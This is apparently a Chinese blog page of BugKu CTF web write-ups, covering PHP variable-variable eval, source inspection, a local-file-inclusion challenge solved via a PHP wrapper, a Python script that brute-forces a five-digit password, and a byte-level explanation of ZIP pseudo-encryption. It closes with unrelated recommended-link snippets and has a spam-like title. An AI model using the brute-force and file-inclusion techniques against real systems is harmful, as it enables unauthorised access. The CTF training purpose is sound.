91.91p06./index.php?,CTF--zip伪加密

最新推荐文章于 2022-10-09 11:34:08 发布
最新推荐文章于 2022-10-09 11:34:08 发布
阅读量1.4k 收藏
点赞数
文章标签: 91.91p06./index.php?

刷题

###一.BUGKU

WEB

1. 变量1

知识点php两个$$是 可变变量,就是一个变量的变量名可以动态的设置和使用 $GLOBALS一个包含了全部变量的全局组合数组。变量的名字就是数组的键

include "flag.php"; //包含flag.php这个文件

$a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值

if(!preg_match('/^\w*$/',$a )){ //正则表达式,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字符组成。

die('ERROR');//不匹配则输出ERROR

}

eval("var_dump($$a);"); //如果匹配输出\$\$a的值

show_source(__FILE__);

?>

3ace7cf950b5384ca1d1f9057b4b6e76.png

2.头等舱

直接burpsuit抓包,看返回包

8c2c18c5960d4b9bfce1e69b46766aa8.png

3.WEB4

给了提示,查看源代码

78c3570ea9f08a2a5cc87ee39fe91933.png js代码,加密了,我们自己写个html文件,可以把eval改为alert,就把代码解密弹出了

6473d5ee8d47e941eba1582152364592.png 弹出的代码

function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").οnsubmit=checkSubmit;

可以看到就是简单的构造一下password,password=67d709b2b54aa2aa648cf6e87a7114f1提交就可得到flag

568f88a71106db5efe08103909a697be.png

4.flag在index里

51354ed368cb16128c59cf175d52b861.png 有一个跳转链接,查看源代码

d2e8c04ebfee61c8f09e02ee0febb49c.png

像是文件包含,用PHP封装协议读取文件

bf2c3c25b5af5f78c77eb088545f3cd4.png base64解码得

Bugku-ctf

error_reporting(0);

if(!$_GET[file]){echo 'click me? no';}

$file=$_GET['file'];

if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

echo "Oh no!";

exit();

}

include($file);

//flag:flag{edulcni_elif_lacol_si_siht}

?>

5.输入密码查看flag

49e9a26b7fb25e443896f62551def2d9.png

5位数可以爆破

1593f5842fe456952a904b18529be8d1.png 附爆破脚本

#coding:utf-8

import requests

url='http://120.24.86.145:8002/baopo/?yes'

value=[]

for i in range(0,99999):

if(len(str(i))<5):

value.append("0"*(5-len(str(i)))+str(i))

else :

value.append(str(i))

data = {'pwd':11111}

content = requests.post(url,data=data)

content.encoding='utf-8'

patch=content.text

for i in value:

data = {'pwd':i}

print 'trying',i

content = requests.post(url,data=data)

content.encoding='utf-8'

html=content.text

#print html

if html != patch:

print html

#print content.text.decode('gbk', 'ignore')

zip伪加密

zip伪加密是在文件头的加密标志位做修改,进而再打开文件时识被别为加密压缩包 一个 ZIP 文件由三个部分组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 压缩源文件数据区: 50 4B 03 04:这是头文件标记(0x04034b50) 14 00:解压文件所需 pkware 版本 00 00:全局方式位标记(有无加密) 08 00:压缩方式 5A 7E:最后修改文件时间 F7 46:最后修改文件日期 16 B5 80 14:CRC-32校验(1480B516) 19 00 00 00:压缩后尺寸(25) 17 00 00 00:未压缩尺寸(23) 07 00:文件名长度 00 00:扩展记录长度 6B65792E7478740BCECC750E71ABCE48CDC9C95728CECC2DC849AD284DAD0500 压缩源文件目录区: 50 4B 01 02:目录中文件文件头标记(0x02014b50) 3F 00:压缩使用的 pkware 版本 14 00:解压文件所需 pkware 版本 00 00:全局方式位标记(有无加密,这个更改这里进行伪加密,改为09 00打开就会提示有密码了) 08 00:压缩方式 5A 7E:最后修改文件时间 F7 46:最后修改文件日期 16 B5 80 14:CRC-32校验(1480B516) 19 00 00 00:压缩后尺寸(25) 17 00 00 00:未压缩尺寸(23) 07 00:文件名长度 24 00:扩展字段长度 00 00:文件注释长度 00 00:磁盘开始号 00 00:内部文件属性 20 00 00 00:外部文件属性 00 00 00 00:局部头部偏移量 6B65792E7478740A00200000000000010018006558F04A1CC5D001BDEBDD3B1CC5D001BDEBDD3B1CC5D001 压缩源文件目录结束标志: 50 4B 05 06:目录结束标记 00 00:当前磁盘编号 00 00:目录区开始磁盘编号 01 00:本磁盘上纪录总数 01 00:目录区中纪录总数 59 00 00 00:目录区尺寸大小 3E 00 00 00:目录区对第一张磁盘的偏移量 00 00:ZIP 文件注释长度

天中浪客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
91.91p06./index.php?,index.html
weixin_39754411的博客
03-29 4165
welcome to my blogLi zhixue's BlogHomeArchivesAbout Li zhixue's Blog李志学的学习心得和技术博客我的第一篇博客文章 2021-01-06more>>Hello World Welcome to Hexo! This is y...
index.php ctf,index.php
weixin_33734005的博客
03-19 281
/*** Author: Porlock* Link: www.porlockz.com* Date: 2018-03-30 16:32:43* Last Modified time:* 1.未登录时,引入未登录header* 2.登陆后,引入已注册header* —————————————未完成—————————————*/session_start();require_once ('init....
91.91p13.space .php,编程知识大杂烩
weixin_39819327的博客
03-21 1643
以下资料完全是随手记录,没有任何顺序或关联,需要用直接^F找就行了。1. ps aux指令详解http://blog.csdn.net/hanner_cheung/article/details/60814402. Linux下配置Apache phphttp://lelong.iteye.com/blog/9041253. shell定义变量http://see.xidian.edu.cn/cp...
91.91p13.space .php,世纪大战:Tab VS Space
weixin_39941262的博客
03-21 701
原标题:世纪大战:Tab VS Space缩进时使用空格键还是Tab键,这是一个严重的问题。点击视频,欣赏《硅谷》第三季,因此男女朋友,两人撕逼、分手。用 Tab 还是 Space?事关程序员的信仰之争。2015 年程序员 Uku Pattak 分析了 GitHub 上多种语言的热门项目(star 数量高)中使用 Tab 和空格的对比情况。2016 年,谷歌程序员 Felipe Hoffa...
91.91p10.space v.php,Luogu P1091 合唱队形
weixin_31435039的博客
03-18 877
Luogu P1091 合唱队形先从\(1\)到\(n\)求一遍最长上升子序列,再反向从\(n\)到\(1\)求一遍最长上升子序列。最后遍历\(1\)到\(n\)得到两端相加最长的。记得输出是出列人数,所以要写\(n-ans\)。#include#define N 110using namespace std;int n,ans;int a[N],f[N][2];void Read() {scan...
cpp-8.3.1-4.5.ky10.aarch64.rpm
06-09
cpp-8.3.1-4.5.ky10.aarch64.rpm
S5120SI_E-CMW520-R1519P06.zip
06-18
本文将详细介绍如何使用提供的"S5120SI_E-CMW520-R1519P06.zip"文件进行固件升级,让您的S5120Si交换机焕发出新的活力。 首先,我们关注的是"标题"——"S5120SI_E-CMW520-R1519P06.zip"。这个文件名包含了关键信息...
电子-LCD屏T27P06SPEC.pdf
09-05
电子-LCD屏T27P06SPEC.pdf,单片机/嵌入式STM32-F3/F4/F7/H7
华三AC控制器固件 WX2560H-CMW710-R5446P06.zip
06-08
本次提及的固件更新——"WX2560H-CMW710-R5446P06.zip",是针对华三AC(Access Controller)控制器的一次重要升级,旨在提升设备的兼容性和性能,特别是对更多AP(Access Point)的支持,进一步优化了网络环境中的...
INET-K70-REV02-130521 维修原理图.pdf
02-03
例如,P01是外壳或覆盖部分,P02是模块块,P03是PIO(可编程输入/输出)分配,P04是电源树结构,P05和P06是两个CPU,P07和P08是两个电源模块,P09是在CPU旁边的电路,P10是HDMI控制,P11包含了HP-FM-KEY-MIC-IR-...
91.91p10.space v.php,luogu P1091 合唱队形
weixin_28807463的博客
03-29 955
任务计划推了很久才做www从两头开始的单调上升队列没啥可说的#include#includeusing namespace std;#define maxn 110int a[maxn];int f[2][maxn];int ans;int main() {int n;scanf("%d",&n);for(int i = 1; i <= n; i++)scanf("%d",&...
95.91p30.space\/index.php,PHP常用的基本文件和目录操作总结
weixin_42351362的博客
03-11 2101
一、基本文件的操作文件的基本操作有:文件判断、目录判断、文件大小、读写性判断、存在性判断及文件时间等1:
大的php文件包含小网页的方式,【CTF题】使用文件包含漏洞读取网页代码
weixin_35726575的博客
03-11 148
CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php...
91p3.space index.php,Estimates of three classical summations on the spaces Fp^α,q(R^n)(0〈p≤ 1).pdf...
weixin_40009099的博客
03-22 2917
Estimates of three classical summations on the spaces Fp^α,q(R^n)(0〈p≤ 1).pdfApp1.Math.3.ChineseUniv2014,29(3):329—338Estimatesofthreeclassicalsummationson thespaces’g()(0GAO Gui—lian ZH...
91p3.space index.php,91p27.space服务器iP
weixin_39534759的博客
03-22 2万+
2018-12-22-----2021-02-1831.13.74.172018-12-24-----2021-02-1869.171.227.372018-12-27-----2021-02-1869.171.233.372018-12-31-----2021-02-1831.13.69.332019-01-24-----2021-02-1867.15.129.2102019-02-07----...
91.w3p.la video.php,www.91porm.me
热门推荐
weixin_34718952的博客
04-01 4万+
WHOIS TERMS & CONDITIONS: Access to .ME WHOIS information is provided toassist persons in determining the contents of a domain name registrationrecord in the .ME registry database. The data in thi...
谷粒商城91p中用fegin调用另一服务失败
CSH__的博客
10-09 6825
谷粒商城91p中用fegin调用另一服务失败
92.91p31.space\/index.php 92.91p31.space,93.91p31.space
weixin_30700095的博客
03-29 9992
监测点ISP省份解析IP解析IP所在地Http状态总时间解析时间连接时间下载时间下载大小文件大小下载速度Http Head操作共71个点6个共27个共3个独立IP共2个独立节点有非200状态1.814s0.914s0.162s0.162s文件不一致文件不一致27.23KB/s联通吉林CLOUDFLAREcloudflare.com2006.141s5.324s0.073s0.072894s2.37...
ctf读取index.php,CTF/CTF练习平台-flag在index里【php://filter的利用】,ctf-flag
weixin_36121078的博客
03-10 1721
CTF/CTF练习平台-flag在index里【php://filter的利用】,ctf-flag原题内容:http://120.24.86.145:8005/post/Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解:首先打开这道题,页面只给你click me? no点击进去显示test5第一步,查看源代码,无果第二步bp,无果结合到题目...
91.91p06./index.php?
最新发布
03-17
这看起来像是一个URL。URL(统一资源定位符)是用于描述互联网上某个资源的地址。在这个例子中,"http://91.91p06./index.php? "是协议,"91.91p06"是域名,"/index.php"是文件路径,"?"后面的部分是查询字符串。不过这个URL不能用来访问任何资源,因为域名是错误的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值